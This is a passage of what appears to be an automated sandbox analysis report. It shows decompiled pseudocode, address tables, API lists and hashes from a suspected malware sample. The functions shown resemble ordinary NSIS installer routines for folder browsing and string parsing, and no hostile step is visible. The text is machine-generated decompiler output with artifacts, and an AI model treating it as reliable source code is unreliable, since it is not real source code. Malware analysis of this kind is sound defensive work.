                                  					if(_t118 != 0x3fb) {
                                  						L12:
                                  						if(_t118 == 0x3e9) {
                                  							_t152 = 7;
                                  							memset( &_v76, 0, _t152 << 2);
                                  							_v80 = _t167;
                                  							_v72 = 0x42d268;
                                  							_v60 = E00404CE0;
                                  							_v56 = _t146;
                                  							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                  							_t122 =  &_v80;
                                  							_v64 = 0x41;
                                  							__imp__SHBrowseForFolderW(_t122);
                                  							if(_t122 == 0) {
                                  								_a8 = 0x40f;
                                  							} else {
                                  								__imp__CoTaskMemFree(_t122);
                                  								E00405E0C(_t146);
                                  								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                  								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
                                  									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                  									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                  										lstrcatW(_t146, 0x432ea0);
                                  									}
                                  								}
                                  								 *0x42d258 =  *0x42d258 + 1;
                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                  							}
                                  						}
                                  						goto L20;
                                  					}
                                  					if(_a12 >> 0x10 != 0x300) {
                                  						goto L53;
                                  					}
                                  					_a8 = 0x40f;
                                  					goto L12;
                                  				} else {
                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                  					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                  						E00405E0C(_t146);
                                  					}
                                  					 *0x433ed8 = _t167;
                                  					SetWindowTextW(_t166, _t146);
                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                  					_push(1);
                                  					E00404499(_t167);
                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                  					_push(0x14);
                                  					E00404499(_t167);
                                  					E004044CE(_t166);
                                  					_t138 = E0040690A(8);
                                  					if(_t138 == 0) {
                                  						L53:
                                  						return E00404500(_a8, _a12, _a16);
                                  					} else {
                                  						 *_t138(_t166, 1);
                                  						goto L8;
                                  					}
                                  				}
                                  			}














































                                  0x0040498a
                                  0x00404990
                                  0x00404996
                                  0x004049a3
                                  0x004049b1
                                  0x004049b4
                                  0x004049bc
                                  0x004049c2
                                  0x004049c2
                                  0x004049ce
                                  0x004049d1
                                  0x00404a3f
                                  0x00404a46
                                  0x00404b1d
                                  0x00404b24
                                  0x00404b33
                                  0x00404b33
                                  0x00404b37
                                  0x00404b41
                                  0x00404b4e
                                  0x00404b50
                                  0x00404b50
                                  0x00404b5e
                                  0x00404b65
                                  0x00404b6c
                                  0x00404b6f
                                  0x00404bab
                                  0x00404bad
                                  0x00404bb3
                                  0x00404bb8
                                  0x00404bbc
                                  0x00404bbe
                                  0x00404bbe
                                  0x00404bda
                                  0x00000000
                                  0x00404bdc
                                  0x00404bdf
                                  0x00404bed
                                  0x00404bf3
                                  0x00404bf4
                                  0x00404bf7
                                  0x00404bfa
                                  0x00000000
                                  0x00404bfa
                                  0x00404b71
                                  0x00404b73
                                  0x00404b77
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404b79
                                  0x00404b79
                                  0x00404b86
                                  0x00404b8b
                                  0x00000000
                                  0x00000000
                                  0x00404b8f
                                  0x00404b91
                                  0x00404b91
                                  0x00404b9a
                                  0x00404b9c
                                  0x00404ba1
                                  0x00404ba4
                                  0x00404ba9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404ba9
                                  0x00404c06
                                  0x00404c10
                                  0x00404c13
                                  0x00404c16
                                  0x00404c1d
                                  0x00404c1d
                                  0x00404c1f
                                  0x00404c1f
                                  0x00404c24
                                  0x00404c26
                                  0x00404c2e
                                  0x00404c35
                                  0x00404c37
                                  0x00404c42
                                  0x00404c42
                                  0x00404c37
                                  0x00404c49
                                  0x00404c52
                                  0x00404c5c
                                  0x00404c64
                                  0x00404c7f
                                  0x00404c66
                                  0x00404c6f
                                  0x00404c6f
                                  0x00404c64
                                  0x00404c84
                                  0x00404c89
                                  0x00404c8e
                                  0x00404c97
                                  0x00404c97
                                  0x00404ca0
                                  0x00404ca2
                                  0x00404ca2
                                  0x00404cae
                                  0x00404cb6
                                  0x00404cc0
                                  0x00404cc0
                                  0x00404cc5
                                  0x00000000
                                  0x00404cc5
                                  0x00404b6f
                                  0x00404b26
                                  0x00404b2d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404b2d
                                  0x00404a4c
                                  0x00404a55
                                  0x00404a6f
                                  0x00404a74
                                  0x00404a7e
                                  0x00404a85
                                  0x00404a91
                                  0x00404a94
                                  0x00404a97
                                  0x00404a9e
                                  0x00404aa6
                                  0x00404aa9
                                  0x00404aad
                                  0x00404ab4
                                  0x00404abc
                                  0x00404b16
                                  0x00404abe
                                  0x00404abf
                                  0x00404ac6
                                  0x00404ad0
                                  0x00404ad8
                                  0x00404ae5
                                  0x00404af9
                                  0x00404afd
                                  0x00404afd
                                  0x00404af9
                                  0x00404b02
                                  0x00404b0f
                                  0x00404b0f
                                  0x00404abc
                                  0x00000000
                                  0x00404a74
                                  0x00404a62
                                  0x00000000
                                  0x00000000
                                  0x00404a68
                                  0x00000000
                                  0x004049d3
                                  0x004049e0
                                  0x004049e9
                                  0x004049f6
                                  0x004049f6
                                  0x004049fd
                                  0x00404a03
                                  0x00404a0c
                                  0x00404a0f
                                  0x00404a12
                                  0x00404a1a
                                  0x00404a1d
                                  0x00404a20
                                  0x00404a26
                                  0x00404a2d
                                  0x00404a34
                                  0x00404ccb
                                  0x00404cdd
                                  0x00404a3a
                                  0x00404a3d
                                  0x00000000
                                  0x00404a3d
                                  0x00404a34

                                  APIs
                                  • GetDlgItem.USER32 ref: 004049D9
                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                  • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                  • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                  • SetDlgItemTextW.USER32 ref: 00404B0F
                                    • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                    • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                    • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                    • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                    • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                    • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                    • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                    • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                  • API String ID: 2624150263-3265145871
                                  • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                  • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                  • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                  • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E732F1BFF() {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				WCHAR* _v24;
                                  				WCHAR* _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				WCHAR* _v48;
                                  				signed int _v52;
                                  				void* _v56;
                                  				intOrPtr _v60;
                                  				WCHAR* _t208;
                                  				signed int _t211;
                                  				void* _t213;
                                  				void* _t215;
                                  				WCHAR* _t217;
                                  				void* _t225;
                                  				struct HINSTANCE__* _t226;
                                  				struct HINSTANCE__* _t227;
                                  				struct HINSTANCE__* _t229;
                                  				signed short _t231;
                                  				struct HINSTANCE__* _t234;
                                  				struct HINSTANCE__* _t236;
                                  				void* _t237;
                                  				intOrPtr* _t238;
                                  				void* _t249;
                                  				signed char _t250;
                                  				signed int _t251;
                                  				struct HINSTANCE__* _t257;
                                  				void* _t258;
                                  				signed int _t260;
                                  				signed int _t261;
                                  				signed short* _t264;
                                  				signed int _t269;
                                  				signed int _t272;
                                  				signed int _t274;
                                  				void* _t277;
                                  				void* _t281;
                                  				struct HINSTANCE__* _t283;
                                  				signed int _t286;
                                  				void _t287;
                                  				signed int _t288;
                                  				signed int _t300;
                                  				signed int _t301;
                                  				signed short _t304;
                                  				void* _t305;
                                  				signed int _t309;
                                  				signed int _t312;
                                  				signed int _t315;
                                  				signed int _t316;
                                  				signed int _t317;
                                  				signed short* _t321;
                                  				WCHAR* _t322;
                                  				WCHAR* _t324;
                                  				WCHAR* _t325;
                                  				struct HINSTANCE__* _t326;
                                  				void* _t328;
                                  				signed int _t331;
                                  				void* _t332;
                                  
                                  				_t283 = 0;
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v16 = 0;
                                  				_v8 = 0;
                                  				_v40 = 0;
                                  				_t332 = 0;
                                  				_v52 = 0;
                                  				_v44 = 0;
                                  				_t208 = E732F12BB();
                                  				_v24 = _t208;
                                  				_v28 = _t208;
                                  				_v48 = E732F12BB();
                                  				_t321 = E732F12E3();
                                  				_v56 = _t321;
                                  				_v12 = _t321;
                                  				while(1) {
                                  					_t211 = _v32;
                                  					_v60 = _t211;
                                  					if(_t211 != _t283 && _t332 == _t283) {
                                  						break;
                                  					}
                                  					_t286 =  *_t321 & 0x0000ffff;
                                  					_t213 = _t286 - _t283;
                                  					if(_t213 == 0) {
                                  						_t37 =  &_v32;
                                  						 *_t37 = _v32 | 0xffffffff;
                                  						__eflags =  *_t37;
                                  						L20:
                                  						_t215 = _v60 - _t283;
                                  						if(_t215 == 0) {
                                  							__eflags = _t332 - _t283;
                                  							 *_v28 = _t283;
                                  							if(_t332 == _t283) {
                                  								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                  								 *(_t332 + 0x1010) = _t283;
                                  								 *(_t332 + 0x1014) = _t283;
                                  							}
                                  							_t287 = _v36;
                                  							_t47 = _t332 + 8; // 0x8
                                  							_t217 = _t47;
                                  							_t48 = _t332 + 0x808; // 0x808
                                  							_t322 = _t48;
                                  							 *_t332 = _t287;
                                  							_t288 = _t287 - _t283;
                                  							__eflags = _t288;
                                  							 *_t217 = _t283;
                                  							 *_t322 = _t283;
                                  							 *(_t332 + 0x1008) = _t283;
                                  							 *(_t332 + 0x100c) = _t283;
                                  							 *(_t332 + 4) = _t283;
                                  							if(_t288 == 0) {
                                  								__eflags = _v28 - _v24;
                                  								if(_v28 == _v24) {
                                  									goto L42;
                                  								}
                                  								_t328 = 0;
                                  								GlobalFree(_t332);
                                  								_t332 = E732F13B1(_v24);
                                  								__eflags = _t332 - _t283;
                                  								if(_t332 == _t283) {
                                  									goto L42;
                                  								} else {
                                  									goto L35;
                                  								}
                                  								while(1) {
                                  									L35:
                                  									_t249 =  *(_t332 + 0x1ca0);
                                  									__eflags = _t249 - _t283;
                                  									if(_t249 == _t283) {
                                  										break;
                                  									}
                                  									_t328 = _t332;
                                  									_t332 = _t249;
                                  									__eflags = _t332 - _t283;
                                  									if(_t332 != _t283) {
                                  										continue;
                                  									}
                                  									break;
                                  								}
                                  								__eflags = _t328 - _t283;
                                  								if(_t328 != _t283) {
                                  									 *(_t328 + 0x1ca0) = _t283;
                                  								}
                                  								_t250 =  *(_t332 + 0x1010);
                                  								__eflags = _t250 & 0x00000008;
                                  								if((_t250 & 0x00000008) == 0) {
                                  									_t251 = _t250 | 0x00000002;
                                  									__eflags = _t251;
                                  									 *(_t332 + 0x1010) = _t251;
                                  								} else {
                                  									_t332 = E732F162F(_t332);
                                  									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                  								}
                                  								goto L42;
                                  							} else {
                                  								_t300 = _t288 - 1;
                                  								__eflags = _t300;
                                  								if(_t300 == 0) {
                                  									L31:
                                  									lstrcpyW(_t217, _v48);
                                  									L32:
                                  									lstrcpyW(_t322, _v24);
                                  									goto L42;
                                  								}
                                  								_t301 = _t300 - 1;
                                  								__eflags = _t301;
                                  								if(_t301 == 0) {
                                  									goto L32;
                                  								}
                                  								__eflags = _t301 != 1;
                                  								if(_t301 != 1) {
                                  									goto L42;
                                  								}
                                  								goto L31;
                                  							}
                                  						} else {
                                  							if(_t215 == 1) {
                                  								_t257 = _v16;
                                  								if(_v40 == _t283) {
                                  									_t257 = _t257 - 1;
                                  								}
                                  								 *(_t332 + 0x1014) = _t257;
                                  							}
                                  							L42:
                                  							_v12 = _v12 + 2;
                                  							_v28 = _v24;
                                  							L59:
                                  							if(_v32 != 0xffffffff) {
                                  								_t321 = _v12;
                                  								continue;
                                  							}
                                  							break;
                                  						}
                                  					}
                                  					_t258 = _t213 - 0x23;
                                  					if(_t258 == 0) {
                                  						__eflags = _t321 - _v56;
                                  						if(_t321 <= _v56) {
                                  							L17:
                                  							__eflags = _v44 - _t283;
                                  							if(_v44 != _t283) {
                                  								L43:
                                  								_t260 = _v32 - _t283;
                                  								__eflags = _t260;
                                  								if(_t260 == 0) {
                                  									_t261 = _t286;
                                  									while(1) {
                                  										__eflags = _t261 - 0x22;
                                  										if(_t261 != 0x22) {
                                  											break;
                                  										}
                                  										_t321 =  &(_t321[1]);
                                  										__eflags = _v44 - _t283;
                                  										_v12 = _t321;
                                  										if(_v44 == _t283) {
                                  											_v44 = 1;
                                  											L162:
                                  											_v28 =  &(_v28[0]);
                                  											 *_v28 =  *_t321;
                                  											L58:
                                  											_t331 =  &(_t321[1]);
                                  											__eflags = _t331;
                                  											_v12 = _t331;
                                  											goto L59;
                                  										}
                                  										_t261 =  *_t321 & 0x0000ffff;
                                  										_v44 = _t283;
                                  									}
                                  									__eflags = _t261 - 0x2a;
                                  									if(_t261 == 0x2a) {
                                  										_v36 = 2;
                                  										L57:
                                  										_t321 = _v12;
                                  										_v28 = _v24;
                                  										_t283 = 0;
                                  										__eflags = 0;
                                  										goto L58;
                                  									}
                                  									__eflags = _t261 - 0x2d;
                                  									if(_t261 == 0x2d) {
                                  										L151:
                                  										_t304 =  *_t321;
                                  										__eflags = _t304 - 0x2d;
                                  										if(_t304 != 0x2d) {
                                  											L154:
                                  											_t264 =  &(_t321[1]);
                                  											__eflags =  *_t264 - 0x3a;
                                  											if( *_t264 != 0x3a) {
                                  												goto L162;
                                  											}
                                  											__eflags = _t304 - 0x2d;
                                  											if(_t304 == 0x2d) {
                                  												goto L162;
                                  											}
                                  											_v36 = 1;
                                  											L157:
                                  											_v12 = _t264;
                                  											__eflags = _v28 - _v24;
                                  											if(_v28 <= _v24) {
                                  												 *_v48 = _t283;
                                  											} else {
                                  												 *_v28 = _t283;
                                  												lstrcpyW(_v48, _v24);
                                  											}
                                  											goto L57;
                                  										}
                                  										_t264 =  &(_t321[1]);
                                  										__eflags =  *_t264 - 0x3e;
                                  										if( *_t264 != 0x3e) {
                                  											goto L154;
                                  										}
                                  										_v36 = 3;
                                  										goto L157;
                                  									}
                                  									__eflags = _t261 - 0x3a;
                                  									if(_t261 != 0x3a) {
                                  										goto L162;
                                  									}
                                  									goto L151;
                                  								}
                                  								_t269 = _t260 - 1;
                                  								__eflags = _t269;
                                  								if(_t269 == 0) {
                                  									L80:
                                  									_t305 = _t286 + 0xffffffde;
                                  									__eflags = _t305 - 0x55;
                                  									if(_t305 > 0x55) {
                                  										goto L57;
                                  									}
                                  									switch( *((intOrPtr*)(( *(_t305 + 0x732f23e8) & 0x000000ff) * 4 +  &M732F235C))) {
                                  										case 0:
                                  											__ecx = _v24;
                                  											__edi = _v12;
                                  											while(1) {
                                  												__edi = __edi + 1;
                                  												__edi = __edi + 1;
                                  												_v12 = __edi;
                                  												__ax =  *__edi;
                                  												__eflags = __ax - __dx;
                                  												if(__ax != __dx) {
                                  													goto L132;
                                  												}
                                  												L131:
                                  												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                  												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                  													L136:
                                  													 *__ecx =  *__ecx & 0x00000000;
                                  													__eax = E732F12CC(_v24);
                                  													__ebx = __eax;
                                  													goto L97;
                                  												}
                                  												L132:
                                  												__eflags = __ax;
                                  												if(__ax == 0) {
                                  													goto L136;
                                  												}
                                  												__eflags = __ax - __dx;
                                  												if(__ax == __dx) {
                                  													__edi = __edi + 1;
                                  													__edi = __edi + 1;
                                  													__eflags = __edi;
                                  												}
                                  												__ax =  *__edi;
                                  												 *__ecx =  *__edi;
                                  												__ecx = __ecx + 1;
                                  												__ecx = __ecx + 1;
                                  												__edi = __edi + 1;
                                  												__edi = __edi + 1;
                                  												_v12 = __edi;
                                  												__ax =  *__edi;
                                  												__eflags = __ax - __dx;
                                  												if(__ax != __dx) {
                                  													goto L132;
                                  												}
                                  												goto L131;
                                  											}
                                  										case 1:
                                  											_v8 = 1;
                                  											goto L57;
                                  										case 2:
                                  											_v8 = _v8 | 0xffffffff;
                                  											goto L57;
                                  										case 3:
                                  											_v8 = _v8 & 0x00000000;
                                  											_v20 = _v20 & 0x00000000;
                                  											_v16 = _v16 + 1;
                                  											goto L85;
                                  										case 4:
                                  											__eflags = _v20;
                                  											if(_v20 != 0) {
                                  												goto L57;
                                  											}
                                  											_v12 = _v12 - 2;
                                  											__ebx = E732F12BB();
                                  											 &_v12 = E732F1B86( &_v12);
                                  											__eax = E732F1510(__edx, __eax, __edx, __ebx);
                                  											goto L97;
                                  										case 5:
                                  											L105:
                                  											_v20 = _v20 + 1;
                                  											goto L57;
                                  										case 6:
                                  											_push(7);
                                  											goto L123;
                                  										case 7:
                                  											_push(0x19);
                                  											goto L143;
                                  										case 8:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L107;
                                  										case 9:
                                  											_push(0x15);
                                  											goto L143;
                                  										case 0xa:
                                  											_push(0x16);
                                  											goto L143;
                                  										case 0xb:
                                  											_push(0x18);
                                  											goto L143;
                                  										case 0xc:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L118;
                                  										case 0xd:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L109;
                                  										case 0xe:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L111;
                                  										case 0xf:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L122;
                                  										case 0x10:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L113;
                                  										case 0x11:
                                  											_push(3);
                                  											goto L123;
                                  										case 0x12:
                                  											_push(0x17);
                                  											L143:
                                  											_pop(__ebx);
                                  											goto L98;
                                  										case 0x13:
                                  											__eax =  &_v12;
                                  											__eax = E732F1B86( &_v12);
                                  											__ebx = __eax;
                                  											__ebx = __eax + 1;
                                  											__eflags = __ebx - 0xb;
                                  											if(__ebx < 0xb) {
                                  												__ebx = __ebx + 0xa;
                                  											}
                                  											goto L97;
                                  										case 0x14:
                                  											__ebx = 0xffffffff;
                                  											goto L98;
                                  										case 0x15:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L116;
                                  										case 0x16:
                                  											__ecx = 0;
                                  											__eflags = 0;
                                  											goto L91;
                                  										case 0x17:
                                  											__eax = 0;
                                  											__eax = 1;
                                  											__eflags = 1;
                                  											goto L120;
                                  										case 0x18:
                                  											_t271 =  *(_t332 + 0x1014);
                                  											__eflags = _t271 - _v16;
                                  											if(_t271 > _v16) {
                                  												_v16 = _t271;
                                  											}
                                  											_v8 = _v8 & 0x00000000;
                                  											_v20 = _v20 & 0x00000000;
                                  											_v36 - 3 = _t271 - (_v36 == 3);
                                  											if(_t271 != _v36 == 3) {
                                  												L85:
                                  												_v40 = 1;
                                  											}
                                  											goto L57;
                                  										case 0x19:
                                  											L107:
                                  											__ecx = 0;
                                  											_v8 = 2;
                                  											__ecx = 1;
                                  											goto L91;
                                  										case 0x1a:
                                  											L118:
                                  											_push(5);
                                  											goto L123;
                                  										case 0x1b:
                                  											L109:
                                  											__ecx = 0;
                                  											_v8 = 3;
                                  											__ecx = 1;
                                  											goto L91;
                                  										case 0x1c:
                                  											L111:
                                  											__ecx = 0;
                                  											__ecx = 1;
                                  											goto L91;
                                  										case 0x1d:
                                  											L122:
                                  											_push(6);
                                  											goto L123;
                                  										case 0x1e:
                                  											L113:
                                  											_push(2);
                                  											goto L123;
                                  										case 0x1f:
                                  											__eax =  &_v12;
                                  											__eax = E732F1B86( &_v12);
                                  											__ebx = __eax;
                                  											__ebx = __eax + 1;
                                  											goto L97;
                                  										case 0x20:
                                  											L116:
                                  											_v52 = _v52 + 1;
                                  											_push(4);
                                  											_pop(__ecx);
                                  											goto L91;
                                  										case 0x21:
                                  											L120:
                                  											_push(4);
                                  											L123:
                                  											_pop(__ecx);
                                  											L91:
                                  											__edi = _v16;
                                  											__edx =  *(0x732f405c + __ecx * 4);
                                  											__eax =  ~__eax;
                                  											asm("sbb eax, eax");
                                  											_v40 = 1;
                                  											__edi = _v16 << 5;
                                  											__eax = __eax & 0x00008000;
                                  											__edi = (_v16 << 5) + __esi;
                                  											__eax = __eax | __ecx;
                                  											__eflags = _v8;
                                  											 *(__edi + 0x1018) = __eax;
                                  											if(_v8 < 0) {
                                  												L93:
                                  												__edx = 0;
                                  												__edx = 1;
                                  												__eflags = 1;
                                  												L94:
                                  												__eflags = _v8 - 1;
                                  												 *(__edi + 0x1028) = __edx;
                                  												if(_v8 == 1) {
                                  													__eax =  &_v12;
                                  													__eax = E732F1B86( &_v12);
                                  													__eax = __eax + 1;
                                  													__eflags = __eax;
                                  													_v8 = __eax;
                                  												}
                                  												__eax = _v8;
                                  												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                  												_t136 = _v16 + 0x81; // 0x81
                                  												_t136 = _t136 << 5;
                                  												__eax = 0;
                                  												__eflags = 0;
                                  												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                  												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                  												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                  												L97:
                                  												__eflags = __ebx;
                                  												if(__ebx == 0) {
                                  													goto L57;
                                  												}
                                  												L98:
                                  												__eflags = _v20;
                                  												_v40 = 1;
                                  												if(_v20 != 0) {
                                  													L103:
                                  													__eflags = _v20 - 1;
                                  													if(_v20 == 1) {
                                  														__eax = _v16;
                                  														__eax = _v16 << 5;
                                  														__eflags = __eax;
                                  														 *(__eax + __esi + 0x102c) = __ebx;
                                  													}
                                  													goto L105;
                                  												}
                                  												_v16 = _v16 << 5;
                                  												_t144 = __esi + 0x1030; // 0x1030
                                  												__edi = (_v16 << 5) + _t144;
                                  												__eax =  *__edi;
                                  												__eflags = __eax - 0xffffffff;
                                  												if(__eax <= 0xffffffff) {
                                  													L101:
                                  													__eax = GlobalFree(__eax);
                                  													L102:
                                  													 *__edi = __ebx;
                                  													goto L103;
                                  												}
                                  												__eflags = __eax - 0x19;
                                  												if(__eax <= 0x19) {
                                  													goto L102;
                                  												}
                                  												goto L101;
                                  											}
                                  											__eflags = __edx;
                                  											if(__edx > 0) {
                                  												goto L94;
                                  											}
                                  											goto L93;
                                  										case 0x22:
                                  											goto L57;
                                  									}
                                  								}
                                  								_t272 = _t269 - 1;
                                  								__eflags = _t272;
                                  								if(_t272 == 0) {
                                  									_v16 = _t283;
                                  									goto L80;
                                  								}
                                  								__eflags = _t272 != 1;
                                  								if(_t272 != 1) {
                                  									goto L162;
                                  								}
                                  								__eflags = _t286 - 0x6e;
                                  								if(__eflags > 0) {
                                  									_t309 = _t286 - 0x72;
                                  									__eflags = _t309;
                                  									if(_t309 == 0) {
                                  										_push(4);
                                  										L74:
                                  										_pop(_t274);
                                  										L75:
                                  										__eflags = _v8 - 1;
                                  										if(_v8 != 1) {
                                  											_t96 = _t332 + 0x1010;
                                  											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                  											__eflags =  *_t96;
                                  										} else {
                                  											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                  										}
                                  										_v8 = 1;
                                  										goto L57;
                                  									}
                                  									_t312 = _t309 - 1;
                                  									__eflags = _t312;
                                  									if(_t312 == 0) {
                                  										_push(0x10);
                                  										goto L74;
                                  									}
                                  									__eflags = _t312 != 0;
                                  									if(_t312 != 0) {
                                  										goto L57;
                                  									}
                                  									_push(0x40);
                                  									goto L74;
                                  								}
                                  								if(__eflags == 0) {
                                  									_push(8);
                                  									goto L74;
                                  								}
                                  								_t315 = _t286 - 0x21;
                                  								__eflags = _t315;
                                  								if(_t315 == 0) {
                                  									_v8 =  ~_v8;
                                  									goto L57;
                                  								}
                                  								_t316 = _t315 - 0x11;
                                  								__eflags = _t316;
                                  								if(_t316 == 0) {
                                  									_t274 = 0x100;
                                  									goto L75;
                                  								}
                                  								_t317 = _t316 - 0x31;
                                  								__eflags = _t317;
                                  								if(_t317 == 0) {
                                  									_t274 = 1;
                                  									goto L75;
                                  								}
                                  								__eflags = _t317 != 0;
                                  								if(_t317 != 0) {
                                  									goto L57;
                                  								}
                                  								_push(0x20);
                                  								goto L74;
                                  							} else {
                                  								_v32 = _t283;
                                  								_v36 = _t283;
                                  								goto L20;
                                  							}
                                  						}
                                  						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                  						if( *((short*)(_t321 - 2)) != 0x3a) {
                                  							goto L17;
                                  						}
                                  						__eflags = _v32 - _t283;
                                  						if(_v32 == _t283) {
                                  							goto L43;
                                  						}
                                  						goto L17;
                                  					}
                                  					_t277 = _t258 - 5;
                                  					if(_t277 == 0) {
                                  						__eflags = _v44 - _t283;
                                  						if(_v44 != _t283) {
                                  							goto L43;
                                  						} else {
                                  							__eflags = _v36 - 3;
                                  							_v32 = 1;
                                  							_v8 = _t283;
                                  							_v20 = _t283;
                                  							_v16 = (0 | _v36 == 0x00000003) + 1;
                                  							_v40 = _t283;
                                  							goto L20;
                                  						}
                                  					}
                                  					_t281 = _t277 - 1;
                                  					if(_t281 == 0) {
                                  						__eflags = _v44 - _t283;
                                  						if(_v44 != _t283) {
                                  							goto L43;
                                  						} else {
                                  							_v32 = 2;
                                  							_v8 = _t283;
                                  							_v20 = _t283;
                                  							goto L20;
                                  						}
                                  					}
                                  					if(_t281 != 0x16) {
                                  						goto L43;
                                  					} else {
                                  						_v32 = 3;
                                  						_v8 = 1;
                                  						goto L20;
                                  					}
                                  				}
                                  				GlobalFree(_v56);
                                  				GlobalFree(_v24);
                                  				GlobalFree(_v48);
                                  				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                  					L182:
                                  					return _t332;
                                  				} else {
                                  					_t225 =  *_t332 - 1;
                                  					if(_t225 == 0) {
                                  						_t187 = _t332 + 8; // 0x8
                                  						_t324 = _t187;
                                  						__eflags =  *_t324 - _t283;
                                  						if( *_t324 != _t283) {
                                  							_t226 = GetModuleHandleW(_t324);
